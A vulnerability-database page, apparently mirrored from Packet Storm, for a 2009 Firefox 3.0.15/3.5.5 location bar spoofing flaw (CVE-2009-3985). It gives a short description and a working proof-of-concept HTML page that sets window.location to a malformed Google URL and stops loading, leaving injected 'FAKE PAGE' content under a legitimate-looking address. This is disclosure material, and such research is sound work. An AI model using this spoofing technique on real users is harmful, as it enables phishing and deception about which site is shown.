Lucene search

K

Mozilla Firefox Location Bar Spoof

๐Ÿ—“๏ธย 18 Dec 2009ย 00:00:00Reported byย Jordi ChancelTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 23ย Views

Mozilla Firefox Location Bar Spoofing Vulnerability in Version 3.0.15 & 3.5.

Show more
Related
Code
ReporterTitlePublishedViews
Family
exploitpack
Mozilla Firefox - Location Bar Spoofing
18 Dec 200900:00
โ€“exploitpack
0day.today
Mozilla Firefox Location Bar Spoofing Vulnerability
18 Dec 200900:00
โ€“zdt
Veracode
Spoofed Content Association
10 Apr 202000:41
โ€“veracode
seebug.org
Firefoxๅ†…ๅฎนๆณจๅ…ฅ็ฝ‘้กตๆฌบ้ช—ๆผๆดž
18 Dec 200900:00
โ€“seebug
seebug.org
Mozilla Firefox Location Bar Spoofing Vulnerability
18 Dec 200900:00
โ€“seebug
UbuntuCve
CVE-2009-3985
15 Dec 200900:00
โ€“ubuntucve
securityvulns
Mozilla Foundation Security Advisory 2009-69
17 Dec 200900:00
โ€“securityvulns
securityvulns
Mozilla Firefox multiple security vulnerabilities
17 Dec 200900:00
โ€“securityvulns
Exploit DB
Mozilla Firefox - Location Bar Spoofing
18 Dec 200900:00
โ€“exploitdb
Cvelist
CVE-2009-3985
17 Dec 200917:00
โ€“cvelist
Rows per page
`<!-----------------------------------------------------------------  
Exploit Title: MOZILLA FIREFOX LOCATION BAR SPOOFING VULNERABILITY  
Date: 2009-12-18  
Author: Jordi Chancel  
Software Link: http://www.mozilla.org/security/announce/2009/mfsa2009-69.html  
Version: Mozilla Firefox 3.0.15 & 3.5.5  
Tested on: Windows XP-VISTA-SEVEN & LINUX BACKTRACK  
CVE : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3985  
DESCRIPTION: {  
Security researcher Jordi Chancel reported an issue similar to one fixed in mfsa2009-44  
in which a web page can set document.location to a URL that can't be displayed properly and then inject  
content into the resulting blank page. An attacker could use this vulnerability to place a legitimate-looking  
but invalid URL in the location bar and inject HTML and JavaScript into the body of the  
page, resulting in a spoofing attack. }  
Code :  
------------------------------------------------------------------------>  
<html>  
<title>FAKE PAGE</title>  
<body onload="javascript:window.location = 'https://www.google.com%20';window.stop();void(0);">  
<title>FAKE PAGE</title>  
<h1>FAKE PAGE</h1>  
<body>  
</html>  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
18 Dec 2009 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.016
23
.json
Report